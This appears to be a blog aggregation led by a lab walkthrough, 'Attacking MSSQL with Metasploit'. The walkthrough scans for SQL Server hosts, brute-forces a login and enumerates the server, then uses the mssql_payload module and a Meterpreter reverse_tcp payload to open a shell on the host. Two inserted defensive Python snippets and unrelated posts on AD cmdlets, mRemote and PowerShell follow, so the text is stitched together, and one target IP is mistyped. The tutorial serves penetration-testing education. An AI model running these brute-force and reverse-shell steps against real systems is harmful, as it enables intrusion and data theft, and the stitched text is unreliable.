Attacking MSSQL with Metasploit
Nowadays hacking has shifted from attacking systems to learn how they work, or for the thrill of getting into a system for the sake of the hunt, to many hackers doing it for profit; in fact many companies and states around the world are employing hackers to obtain information for both political and financial gain. One of the places where most of this information resides is in databases, and one of the most popular databases in enterprises and governments nowadays is Microsoft SQL Server. In this blog post I will cover some of the attacks you can do against this system with Metasploit 3.3.
The Microsoft SQL Server product is in fact a suite of products composed of several services like reporting, integration and others. In addition there is a large number of editions depending on the version: for instance, in MSSQL 2000 there is an MSDE edition for desktops that is small and light, and with MSSQL 2005 and 2008 there are Express, Web, Standard and Enterprise, to mention the most popular. In this blog post I will focus mainly on the database component. MSSQL listens on 2 ports, TCP port 1433 and UDP port 1434; server instances get a random TCP port, and this port can be obtained through UDP port 1434.
It has 2 methods of authentication that can be configured: SQL Authentication and Windows Authentication. These 2 methods differ in where the account credentials are stored and what policy is applied to the account. In MSSQL 2000, SQL Authentication is one of the most abused methods of gaining access to the database: it does not log authentication attempts by default, it is clear text, and by default there is no account lockout or password policy on this version of MSSQL. In the more recent versions, SQL 2005 and SQL 2008, this differs in that the account policy applied is that of the Windows host where the database engine is running; I have seen DBAs (Database Administrators) in production environments disable the policy checks for SQL accounts in the latest versions. Another drawback of using SQL Authentication is the presence of the SA account: this account runs as sysadmin on the Database Engine, and through the stored procedures on MSSQL it can execute commands against the host OS with the privileges under which the Database Engine is running. As you can see, using Windows Authentication, and making sure developers use Windows accounts, is the way to go when hardening an MS SQL system.
One important note is that when the server is set for SQL Authentication it will also authenticate Windows users; this is known as Mixed mode. In MSSQL 2000 and 2005 the local Administrators group is given the sysadmin role by default, and on MSSQL 2008 only the local Administrator account is given permission. On MSSQL clusters the service account for the Database Engine has to be a domain account, and in many installations I have seen this account be part of the Domain Administrators group. This information can be of great use when doing post exploitation on an MSSQL host. Another important part of MSSQL systems is that they come with a large number of stored procedures that permit command execution on the host, modification of the host's registry, file manipulation, sending emails and many other functions as “Features”, making the post-exploitation aspect of an MSSQL attack a very interesting one.
So let's start by finding all hosts running MSSQL database instances on a network. For this Metasploit has an auxiliary module called mssql_ping; below you will see how to use this module and the options it offers from a msfconsole window.
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > info

Name: MSSQL Ping Utility
Version: 6479
License: Metasploit Framework License (BSD)

Provided by:
MC <m...@metasploit.com>

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEX2BINARY /home/carlos/framework3/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk
MSSQL_PASS no The password for the specified username
MSSQL_USER sa no The username to authenticate as
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for information.

msf auxiliary(mssql_ping) > show advanced

Module advanced options:

Name : CHOST
Current Setting:
Description : The local client address

Name : CPORT
Current Setting:
Description : The local client port

Name : ConnectTimeout
Current Setting: 10
Description : Maximum number of seconds to establish a TCP connection

Name : Proxies
Current Setting:
Description : Use a proxy chain

Name : SSL
Current Setting: false
Description : Negotiate SSL for outgoing connections

Name : SSLVersion
Current Setting: SSL3
Description : Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

Name : ShowProgress
Current Setting: true
Description : Display progress messages during a scan

Name : ShowProgressPercent
Current Setting: 10
Description : The interval in percent that progress should be shown

The 2 options we need are the RHOSTS and the THREADS options. Let's set them and run the module against the network in my lab.

msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.1/24
RHOSTS => 192.168.1.1/24
msf auxiliary(mssql_ping) > set THREADS 10
THREADS => 10
msf auxiliary(mssql_ping) > run
[*] Scanned 026 of 256 hosts (010% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 077 of 256 hosts (030% complete)
[*] SQL Server information for 192.168.1.108:
[*] tcp = 1433
[*] Version = 9.00.1399.06
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = DBSQL2K501
[*] Scanned 103 of 256 hosts (040% complete)
[*] Scanned 128 of 256 hosts (050% complete)
[*] SQL Server information for 192.168.1.156:
[*] tcp = 1433
[*] Version = 10.0.1600.22
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = DBSQL2K801
[*] Scanned 155 of 256 hosts (060% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 205 of 256 hosts (080% complete)
[*] Scanned 232 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) >

As can be seen, 2 servers were found. Now, I always like to corroborate my findings with other tools so I can be sure I’m targeting the correct targets and the correct versions; for this we will use the nmap port scanner with one of its NSE scripts.

carlos@loki:~$ sudo nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156

Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2009-11-26 21:25 AST
NSE: Script Scanning completed.
Nmap scan report for 192.168.1.108
Host is up (0.00071s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
123/udp open|filtered ntp
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
1434/udp open ms-sql-m
| ms-sql-info: ServerName;DBSQL2K501;InstanceName;TESTLABINST;IsClustered;No;Version;9.00.1399.06;tcp;1033;;
| Server name: DBSQL2K501
| Server version: 9.00.1399.06 (RTM)
| Instance name: MSSQLSERVER
| TCP Port: 1433
| Could not retrieve actual version information
| Instance name: TESTLABINST
| TCP Port: 1033
|_ Could not retrieve actual version information
4500/udp open|filtered nat-t-ike
MAC Address: 00:0C:29:1B:83:F5 (VMware)

Nmap scan report for 192.168.1.156
Host is up (0.00073s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
123/udp open|filtered ntp
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
1434/udp open ms-sql-m
| ms-sql-info: Discovered Microsoft SQL Server
| Server name: DBSQL2K801
| Server version: 10.0.1600.22
| Instance name: MSSQLSERVER
| TCP Port: 1433
| Could not retrieve actual version information
| Instance name: TESTINST
| TCP Port: 1123
|_ Could not retrieve actual version information
4500/udp open|filtered nat-t-ike
MAC Address: 00:0C:29:38:20:33 (VMware)

Nmap done: 2 IP addresses (2 hosts up) scanned in 2.79 seconds
carlos@loki:~$

As can be seen from the nmap scan, there is a second instance on each of the hosts. One special note is that when you run the nmap scan with the ms-sql-info NSE script the scan must be a UDP scan and nmap must be run as root. Another way is to use Nessus in command-line mode with the plug-in ID 10674.

carlos@loki:/opt/nessus/bin$ sudo ./nessuscmd -i 10674 192.168.1.0/24 --max-hosts 25
Starting nessuscmd 4.0.2
Scanning '192.168.1.0/24'...
+ Host 192.168.1.1 is up
+ Host 192.168.1.2 is up
+ Results found on 192.168.1.108 :
- Port ms-sql-m (1434/udp)
[i] Plugin ID 10674
| A 'ping' request returned the following information about the remote
| SQL instances :
|
|
| ServerName : DBSQL2K501
| InstanceName : MSSQLSERVER
| IsClustered : No
| Version : 9.00.1399.06
| tcp : 1433
|
|
| ServerName : DBSQL2K501
| InstanceName : TESTLABINST
| IsClustered : No
| Version : 9.00.1399.06
| tcp : 1033
|
|

+ Results found on 192.168.1.156 :
- Port ms-sql-m (1434/udp)
[i] Plugin ID 10674
| A 'ping' request returned the following information about the remote
| SQL instances :
|
|
| ServerName : DBSQL2K801
| InstanceName : MSSQLSERVER
| IsClustered : No
| Version : 10.0.1600.22
| tcp : 1433
|
|
| ServerName : DBSQL2K801
| InstanceName : TESTINST
| IsClustered : No
| Version : 10.0.1600.22
| tcp : 1123
|
|

+ Host 192.168.1.157 is up
+ Host 192.168.1.179 is up
+ Host 192.168.1.194 is up
+ Host 192.168.1.232 is up
+ Host 192.168.1.239 is up
+ Host 192.168.1.245 is up
carlos@loki:/opt/nessus/bin$

As can be seen, each tool gives a different level of information, but I have found that one of the fastest ways is to use Microsoft's own tools. The Microsoft SQL Server Management Studio that comes as part of MS SQL 2005 and MS SQL 2008 is one of the fastest at finding MSSQL machines on the same subnet, and it also helps in identifying any other MS SQL services that might be available, something that the other tools do not detect or look for.
We start by bringing up Microsoft SQL Server Management Studio and, in the login box, choosing to browse for more servers than the local ones.
On the next screen we select the Network Servers tab, and there we will see what it discovered.
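The tools above all read the same SQL Server Browser reply from UDP 1434, the semicolon-separated string that nmap prints raw. As an added example (not from the original post), this Python sketch parses such replies offline into an instance inventory and marks instances on a non-default port; the packets are constructed from the lab values shown above, and the function names are this example's own.

```python
import struct

# First four characters of the version string -> product (well-known mapping).
PRODUCTS = {"8.00": "SQL Server 2000", "9.00": "SQL Server 2005",
            "10.0": "SQL Server 2008"}
DEFAULT_PORT = 1433


def parse_browser_response(packet):
    """Return one dict per instance from a SQL Server Browser reply.

    Layout (MC-SQLR SVR_RESP): byte 0x05, 2-byte little-endian length,
    then 'key;value;...;;' records, one record per instance.
    """
    if len(packet) < 3 or packet[0] != 0x05:
        raise ValueError("not a SQL Server Browser response")
    (size,) = struct.unpack_from("<H", packet, 1)
    data = packet[3:3 + size]
    if len(data) != size:
        raise ValueError("truncated response")
    instances = []
    for record in data.decode("ascii", errors="replace").split(";;"):
        fields = record.split(";")
        if len(fields) < 2:
            continue  # empty piece after the final ';;'
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def inventory(responses):
    """Flatten {host: packet} into rows that can be diffed against an asset list."""
    rows = []
    for host, packet in sorted(responses.items()):
        for inst in parse_browser_response(packet):
            tcp = inst.get("tcp", "")
            port = int(tcp) if tcp.isdigit() else None
            version = inst.get("Version", "")
            rows.append({
                "host": host,
                "server": inst.get("ServerName"),
                "instance": inst.get("InstanceName"),
                "version": version,
                "product": PRODUCTS.get(version[:4], "unknown"),
                "tcp_port": port,
                # Named instances on other ports are easy to miss in
                # firewall rules and patch inventories.
                "non_default_port": port is not None and port != DEFAULT_PORT,
            })
    return rows


def make_packet(text):
    """Wrap a reply string in the SVR_RESP header (used for the sample data)."""
    body = text.encode("ascii")
    return b"\x05" + struct.pack("<H", len(body)) + body


# Constructed sample replies built from the lab hosts shown in the post.
SAMPLE = {
    "192.168.1.108": make_packet(
        "ServerName;DBSQL2K501;InstanceName;MSSQLSERVER;IsClustered;No;"
        "Version;9.00.1399.06;tcp;1433;;"
        "ServerName;DBSQL2K501;InstanceName;TESTLABINST;IsClustered;No;"
        "Version;9.00.1399.06;tcp;1033;;"),
    "192.168.1.156": make_packet(
        "ServerName;DBSQL2K801;InstanceName;MSSQLSERVER;IsClustered;No;"
        "Version;10.0.1600.22;tcp;1433;;"
        "ServerName;DBSQL2K801;InstanceName;TESTINST;IsClustered;No;"
        "Version;10.0.1600.22;tcp;1123;;"),
}

if __name__ == "__main__":
    for row in inventory(SAMPLE):
        flag = "  <-- non-default port" if row["non_default_port"] else ""
        print(f'{row["host"]:15} {row["instance"]:12} {row["product"]:16} '
              f'tcp/{row["tcp_port"]}{flag}')
```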
Now for our next attack we will do a brute force attack, but first we have to find out if the servers are configured for SQL Authentication. Here Management Studio comes into play again: we can select a server, give it bogus credentials, and the error message we get back will tell us if it is.
When we get a message that says the user is not associated with a trusted SQL Server connection, it means that there is a mismatch of protocol, which tells us that the server does not support SQL Authentication. If SQL Authentication is enabled, the message would be a login failed message.
Now that we know which server to attack with the brute force we can choose the SA account, but since this server is MS SQL 2008 and SA is disabled by default there, we might have to try another account if SA fails. In our case we will assume we got the user meta from an IIS 500 error. In Metasploit we load the brute force login module for MS SQL.
msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > info

Name: MSSQL Login Utility
Version: 7185
License: Metasploit Framework License (BSD)

Provided by:
MC <m...@metasploit.com>

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEX2BINARY /home/carlos/framework3/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk
MSSQL_PASS no The password for the specified username
MSSQL_PASS_FILE no A dictionary of passwords to perform a bruteforce attempt
MSSQL_USER sa no The username to authenticate as
RHOSTS yes The target address range or CIDR identifier
RPORT 1433 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for a specific
user/pass (default is sa with blank).

We have to give it our target host in the RHOSTS variable, the username to test in MSSQL_USER and the dictionary file in MSSQL_PASS_FILE. The THREADS value will depend on the network connection and the load on the target; for this example I will leave it as it is, but I tend to start with 50 and then reduce in increments of 5 if I get any errors.

msf auxiliary(mssql_login) > set MSSQL_USER meta
MSSQL_USER => meta
msf auxiliary(mssql_login) > set MSSQL_PASS_FILE /tmp/dict.txt
MSSQL_PASS_FILE => /tmp/dict.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.156
RHOSTS => 192.168.1.156
msf auxiliary(mssql_login) > run
[*] 192.168.1.156:1433 successful logged in as 'meta' with password 'meta'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) >

Now that we have a username and password, let's enumerate the MSSQL server with the enumeration module.

msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf auxiliary(mssql_enum) > info

Name: Microsoft SQL Server Configuration Enumerator
Version: 7226
License: Metasploit Framework License (BSD)

Provided by:
Carlos Perez <carl...@darkoperator.com>

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEX2BINARY /home/carlos/framework3/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk
MSSQL_PASS no The password for the specified username
MSSQL_USER sa no The username to authenticate as
RHOST yes The target address
RPORT 1433 yes The target port

Description:
This module will perform a series of configuration audits and
security checks against a Microsoft SQL Server database. For this
module to work, valid administrative user credentials must be
supplied.

msf auxiliary(mssql_enum) >

We will provide the username and password we found in addition to the target and run it.

msf auxiliary(mssql_enum) > set MSSQL_USER meta
MSSQL_USER => meta
msf auxiliary(mssql_enum) > set MSSQL_PASS meta
MSSQL_USER => meta
msf auxiliary(mssql_enum) > set RHOST 192.168.1.156
RHOST => 192.168.1.156
msf auxiliary(mssql_enum) > run
[*] Running MS SQL Server Enumeration...
[*] Auxiliary module execution completed
msf auxiliary(mssql_enum) > set MSSQL_PASS meta
MSSQL_PASS => meta
msf auxiliary(mssql_enum) > run
[*] Running MS SQL Server Enumeration...
[*] Version:
[*] Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86)
[*] Jul 9 2008 14:43:34
[*] Copyright (c) 1988-2008 Microsoft Corporation
[*] Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2)
[*] Configuration Parameters:
[*] C2 Audit Mode is Not Enabled
[*] xp_cmdshell is Enabled
[*] remote access is Enabled
[*] allow updates is Not Enabled
[*] Database Mail XPs is Not Enabled
[*] Ole Automation Procedures are Not Enabled
[*] Databases on the server:
[*] Database name:master
[*] Databse Files for master:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\master.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\mastlog.ldf
[*] Database name:tempdb
[*] Databse Files for tempdb:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\tempdb.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\templog.ldf
[*] Database name:model
[*] Databse Files for model:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\model.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\modellog.ldf
[*] Database name:msdb
[*] Databse Files for msdb:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBLog.ldf
[*] System Logins on this Server:
[*] sa
[*] ##MS_SQLResourceSigningCertificate##
[*] ##MS_SQLReplicationSigningCertificate##
[*] ##MS_SQLAuthenticatorCertificate##
[*] ##MS_PolicySigningCertificate##
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] ##MS_AgentSigningCertificate##
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\NETWORK SERVICE
[*] DBSQL2K801\Administrator
[*] dangerlogin
[*] meta
[*] Disabled Accounts:
[*] sa
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] No Accounts Policy is set for:
[*] dangerlogin
[*] meta
[*] Password Expiration is not checked for:
[*] sa
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] dangerlogin
[*] meta
[*] System Admin Logins on this Server:
[*] sa
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\NETWORK SERVICE
[*] DBSQL2K801\Administrator
[*] meta
[*] Windows Logins on this Server:
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\NETWORK SERVICE
[*] DBSQL2K801\Administrator
[*] Windows Groups that can logins on this Server:
[*] No Windows Groups where found with permission to login to system.
[*] Accounts with Username and Password being the same:
[*] meta
[*] Accounts with empty password:
[*] No Accounts with empty passwords where found.
[*] Stored Procedures with Public Execute Permission found:
[*] sp_replsetsyncstatus
[*] sp_replcounters
[*] sp_replsendtoqueue
[*] sp_resyncexecutesql
[*] sp_prepexecrpc
[*] sp_repltrans
[*] sp_xml_preparedocument
[*] xp_qv
[*] xp_getnetname
[*] sp_releaseschemalock
[*] sp_refreshview
[*] sp_replcmds
[*] sp_unprepare
[*] sp_resyncprepare
[*] sp_createorphan
[*] xp_dirtree
[*] sp_replwritetovarbin
[*] sp_replsetoriginator
[*] sp_xml_removedocument
[*] sp_repldone
[*] sp_reset_connection
[*] xp_fileexist
[*] xp_fixeddrives
[*] sp_getschemalock
[*] sp_prepexec
[*] xp_revokelogin
[*] sp_resyncuniquetable
[*] sp_replflush
[*] sp_resyncexecute
[*] xp_grantlogin
[*] sp_droporphans
[*] xp_regread
[*] sp_getbindtoken
[*] sp_replincrementlsn
[*] Instances found on this server:
[*] MSSQLSERVER
[*] TESTINST
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*] NT AUTHORITY\NETWORK SERVICE
[*] Instance TESTINST SQL Server Service is running under the privilage of:
[*] LocalSystem
[*] Auxiliary module execution completed
msf auxiliary(mssql_enum) >

Now we know which stored procedures are enabled, the accounts, whether policy is applied, and a wealth of other information to continue our attack. One critical piece of information is that the instance is running as LocalSystem, so we can get a shell on the system; if it was Network Service we would not be able to start our shell. Since nothing beats having a nice Meterpreter shell, let's move from SQL access to a shell on the host with the MSSQL Payload exploit module.

msf exploit(mssql_payload) > info

Name: Microsoft SQL Server Payload Execution
Version: 7236
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)

Provided by:
David Kennedy "ReL1K" <kenn...@gmail.com>

Available targets:
Id Name
-- ----
0 Automatic

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEX2BINARY /home/carlos/framework3/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk
MSSQL_PASS no The password for the specified username
MSSQL_USER sa no The username to authenticate as
RHOST yes The target address
RPORT 1433 yes The target port

Payload information:

Description:
This module will execute an arbitrary payload on a Microsoft SQL
Server, using the Windows debug.com method for writing an executable
to disk and the xp_cmdshell stored procedure. File size restrictions
are avoided by incorporating the debug bypass method presented at
Defcon 17 by SecureState. Note that this module will leave a
metasploit payload in the Windows System32 directory which must be
manually deleted once the attack is completed.

References:
http://www.osvdb.org/557
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402
http://www.securityfocus.com/bid/1281
http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf

msf exploit(mssql_payload) >

We set our values, including our payload, and let the exploit module run.

msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(mssql_payload) > set RHOST 92.168.1.156
RHOST => 92.168.1.156
msf exploit(mssql_payload) > set MSSQL_USER meta
MSSQL_USER => meta
msf exploit(mssql_payload) > set MSSQL_PASS meta
MSSQL_PASS => meta
msf exploit(mssql_payload) > exploit
msf exploit(mssql_payload) > exploit
[*] Started reverse handler on port 4444
[*] Warning: This module will leave fGDpiveA.exe in the SQL Server %TEMP% directory
[*] Writing the debug.com loader to the disk...
[*] Converting the debug script to an executable...
[*] Uploading the payload, please be patient...
[*] Converting the encoded payload...
[*] Executing the payload...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.156:1708)

meterpreter > sysinfo
Computer: DBSQL2K801
OS : Windows .NET Server (Build 3790, Service Pack 2).
Arch : x86
Language: en_US
meterpreter >

I hope you find this post useful and of help; this is only the basics of what can be done to and through an MS SQL server.
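The password guessing shown with mssql_login earlier in this post is visible to a defender when SQL Server login auditing records failed and successful logins. As an added example (not part of the original post), this Python sketch scans ERRORLOG-style lines for a burst of failures from one client against one login and for a success that follows the burst; the log lines, threshold and window are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Matches the "Logon" audit lines SQL Server writes to its error log when
# login auditing is enabled; any "Reason: ..." text before [CLIENT: ...]
# is skipped so both short and long message forms match.
LOGIN_LINE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'\."
    r".*\[CLIENT: (?P<client>[^\]]+)\]"
)


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return alerts as (kind, client, user, timestamp) tuples.

    'bruteforce' fires once when a (client, user) pair reaches `threshold`
    failures inside `window`; 'success_after_bruteforce' fires when that
    same pair then logs in while the burst is still inside the window.
    """
    failures = defaultdict(deque)  # (client, user) -> recent failure times
    flagged = set()                # pairs already alerted on
    alerts = []
    for line in lines:
        m = LOGIN_LINE.match(line)
        if not m:
            continue  # e.g. the "Error: 18456, Severity: 14" companion line
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
        key = (m["client"], m["user"])
        recent = failures[key]
        while recent and ts - recent[0] > window:
            recent.popleft()  # forget failures older than the window
        if not recent:
            flagged.discard(key)  # burst has aged out, allow a new alert
        if m["result"] == "failed":
            recent.append(ts)
            if len(recent) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("bruteforce", key[0], key[1], ts))
        elif key in flagged:
            # A guess most likely worked: this is the alert to escalate.
            alerts.append(("success_after_bruteforce", key[0], key[1], ts))
            flagged.discard(key)
            recent.clear()
    return alerts


def failed_line(second, user, client):
    """Build one constructed 'Login failed' line for the sample log."""
    return (f"2009-11-26 21:40:{second:02d}.10 Logon       "
            f"Login failed for user '{user}'. Reason: Password did not match "
            f"that for the login provided. [CLIENT: {client}]")


# Constructed sample log: one unrelated failure, six quick failures for
# 'meta' from one client, then a successful login for the same pair.
SAMPLE_LOG = (
    ["2009-11-26 21:39:50.00 Logon       Error: 18456, Severity: 14, State: 8.",
     failed_line(0, "app", "192.168.1.20")]
    + [failed_line(s, "meta", "192.168.1.158") for s in range(6)]
    + ["2009-11-26 21:40:07.30 Logon       Login succeeded for user 'meta'. "
       "Connection made using SQL Server authentication. "
       "[CLIENT: 192.168.1.158]"]
)

if __name__ == "__main__":
    for kind, client, user, ts in detect_bruteforce(SAMPLE_LOG):
        print(f"{ts}  {kind:26} client={client} login={user}")
```

Without login auditing turned on for the instance there are no such lines to scan, which is the MSSQL 2000 default the post describes.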
AD Cmdlets 1.3 RTMed
Late last week we released to the web the latest version (1.3) of our free Active Directory cmdlets (also known as QAD-cmdlets, widely used by tens of thousands of admins and compatible with more or less any version of Active Directory or ADAM/ADLDS).
You can read more about the cmdlets in this PDF guide, or online reference.
This is a significant update with some 14 new cmdlets, 24 new parameters, 43 enhanced ones, and a few bugs fixed (not that we had any really).
Detailed What’s New information can be found on page 19 of the PDF guide and in my upcoming blog posts. Download the new AD cmdlets now and let us know what you think by posting to the AD PowerShell discussion forum!
Managing Multiple Remote Connections mRemote (Open-Source) Connection Manager
by Wesley D - November 23, 2009
It seems as if the ratio between Systems Administrators and the systems that they must manage is getting higher and higher. At the same time, budgets are getting smaller and smaller. You may have managed to get a copy of Windows 7 out of the budget, but not much else. One way to save both money and aid in the administration of multiple remote systems is with the free and open-source tool mRemote (released under the GPL license).
The mRemote project was actively developed up until late 2008 when it was merged with a commercial, closed-source multiple remote desktop tool called vRD. However, in spite of the project having been officially halted, mRemote is quite mature and has no crippling restriction on its available features like the free version of vRD does.
Supported Protocols:
mRemote supports creating connections with the following protocols:
- Remote Desktop Protocol
- VNC
- Citrix ICA
- SSH
- Telnet
- HTTP and HTTPS
- rlogin
- RAW
Connections using RDP require version 6.0 of the Microsoft Terminal Services Client. Citrix ICA connections require you to download the free ICA Client from Citrix.com. Telnet, SSH, rlogin and RAW connections require the use of PuTTY as an external helper application. All mRemote packages come with PuTTY already included in the files. HTTP and HTTPS connections can be made within mRemote using the Internet Explorer rendering engine. However, you can also use the Gecko (Firefox) rendering engine if you download the free XULrunner.
User Interface:
One of the best features of mRemote is its user interface. Anyone who is familiar with Visual Studio or the SQL Server Management Studio will instantly be at home with mRemote.
mRemote uses pinnable information panes for all of its various information consoles. For instance, the Connections pane is where you manage all of your connection files and folders. The Config pane displays all of the configuration information for the selected connection or folder as well as allowing you to edit the information. If you unpin a pane it retracts into the side of the mRemote console and shows itself as a tab. Hovering the mouse over a tab causes the pane to fly out, just like Visual Studio. The above image shows the retracted "Errors and Info" and "Screenshots" tabs on the bottom of the program's window.
Just like in Visual Studio, you can tear panes off of any side and attach them to any other side, as well as placing them directly in the center of the window.
To save even more space and allow for more efficient workflows, the remote connection windows themselves can be placed in unpinned tabs for easy fly-out access!
Connections are displayed in panels and tabs. Multiple panels can be created and each panel can contain tabs. Panels and tabs can be seen in the previous pictures. Towards the top of the application screen, the visual elements that look like tabs and are titled "Home" and "Alpha" are actually what mRemote refers to as panels. Underneath the panel and above the remote display are multiple icons with the title of a connection. Those are referred to as tabs and are what the remote connection is displayed within. In this way, you can more easily keep track of multiple connections based on the remote connection's function, location or any other designation you choose. For example, I prefer to have a separate panel for each network and then tabs of each connection on that network underneath.
Creating your Connections
Connections can be created manually, copied from an already existing connection or imported from supported file types. mRemote supports importing connections from Active Directory, .RDP files, a port scan or its own mRemote XML file type. The port scan feature allows you to scan an entire subnet for standard open ports that would indicate a VNC, RDP or other supported connection type is listening for incoming connections.
Managing your Connections
Your connection files can be managed via a simple folder system displayed in the Connections pane. However, those folders can have a complex system of inheritance that allows you to propagate common settings to all subordinate connection files. When you select a folder, the Configuration panel allows you to edit all available connection options for all available connection types. When a connection is placed within that folder, the connection file can be set to inherit all options for that connection type from its parent folder or just individual options.
The image on the left displays some of a folder's inheritable options and the image on the right displays a child connection's inheritable options.
The ability to inherit options makes creating new connections fast and easy. As an example, folders could be created based on account type ("Domain Admin", "Accounting Admin", "Lisbon Power User", etc.) or computer type ("SharePoint Farm Members", "Apache Front Ends", etc.) and all connection files placed within have the ability to inherit username, password, domain, and all other options without tedious manual entry.
Connection files can be exported or saved as vRD CSV, mRemote CSV or mRemote XML files to provide a backup copy or to share with others. mRemote also provides a beta ability to store connection files in a SQL Server database. This allows multiple users to access and modify the same set of connections simultaneously within one database. It should be noted that the SQL Server feature was experimental and your results may vary.
mRemote is Portable!
What can make an already immensely useful utility even more useful? If it's portable! The mRemote application comes in several different downloadable formats: A Windows Setup file, a binary package, a source package and a portable package. The executable in the portable package is made to store and retrieve its settings from files within its own directory. However, in order to use the various connection types you will need to manually register one dll file each for RDP, VNC and ICA connections to work (simply using regsvr32 at a command prompt). Instructions on how to do that are included in the application.
Customizations
mRemote offers the ability to create small "macros" within itself that call external applications and pass command line arguments to them. mRemote also offers the use of internal variables that can help when building the argument string. The supported variables are: %name%, %hostname%, %port%, %username%, %password%, %domain%, and %description%. To explain that better, I'll use the example that is supplied in mRemote's own documentation.
The example we'll look at is creating the ability to perform a simple tracert command to any host that is listed in the Connections pane. First you simply navigate to the External Applications management interface and add an instance of an external application. From there you create the display name (the name that will be seen within mRemote), give the path to the executable (in our case simply putting 'cmd' will work) and then pass the appropriate commands to the application ("/K tracert %hostname%" in our case).
From there, the new external application macro will be available from the context menu that appears when you right click any connection. When you take into consideration Windows 7's native support for PowerShell 2.0, the external application feature becomes even more powerful.
Miscellaneous Features
mRemote's features don't stop yet! There are various other capabilities such as a simple screenshot manager that can be used to take pictures of remote connections and save those files in the Screenshot Manager pane. This can come in handy when documenting your work. SSH file transfer is supported through SCP/SFTP. UltraVNC's single click is available. There is even a rudimentary port scanner included.
If your company is like mine, you are feeling the squeeze of a tightening budget as well as an increasing pool of systems to maintain. That was one of the reasons I started looking for an application like mRemote. It has helped me to streamline my daily workflow and, best of all, it works on Windows 7. I hope that it will help you out too! You can download the free, open source, mRemote here.
Just downloaded a copy and it looks very good
Getting Started with PowerShell
Reminder, there will be no PowerScripting Live this week due to the US Thanksgiving holiday. Next live show is Dec 1st. This means the next episode won’t be released on the website/iTunes until Dec 7th.
That said, we don’t want to leave you hungry! With that in mind, here’s a couple of resources for the new scripters out there. Even if you aren’t a newbie, you should check out both of these resources as there are plenty of tips within which you may not have come across before.
And here is a massive list of videos available about Powershell from three of Microsoft’s media portal sites:
- PowerShell videos from TechEd Online
- PowerShell videos from Channel 9
- PowerShell videos from Technet Edge
Fixing Search Results: PowerShell 2.0 is RTM
